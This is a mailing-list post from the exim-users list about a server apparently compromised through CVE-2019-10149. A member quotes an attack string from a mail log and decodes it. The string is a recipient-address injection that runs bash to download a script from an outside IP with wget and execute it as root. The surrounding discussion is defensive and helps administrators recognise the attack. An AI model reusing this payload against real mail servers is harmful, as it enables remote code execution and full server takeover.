Re: [exim] just been hacked, could be CVE-2019-10149?

Top Page
This message is part of the following thread:
M-+-+-\the complete thread tree sorted by date
M.M\M\MCyborg at <-
M\MMMMMKlaus Ethgen at ->
Delete this message
Reply to this message
Author: Cyborg
Date:  
To: exim-users
Subject: Re: [exim] just been hacked, could be CVE-2019-10149?
Am 11.06.19 um 02:10 schrieb Calum Mackay via Exim-users:
> root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2efabyfmnp\x20\x26\x26\x20sh\x20\x2froot\x2f\x2efabyfmnp\x20\x2dn\x22\x20\x26}}@xxx:
> Too many "Received" headers - suspected mail loop
>

For anyone interessted, this is what it looks like unscrambled:

root+${run{/bin/bash -c "wget --no-check-certificate -T 36
https://185.162.235.211/ldm1ip -O /root/.fabyfmnp && sh /root/.fabyfmnp
-n" &}}@xxx: Too many "Received" headers - suspected mail loop


Marius

This message was posted to the following mailing lists:
Exim-users
Mailing List Info | Nearby Messages		<-Re: [exim] just been hacked, could be CVE-2019-10149?Re: [exim] just been hacked, could be CVE-2019-10149?->
Tahini and Hummus and Cumin Development Archives administrated by cumin AdminsLurker (version 2.3)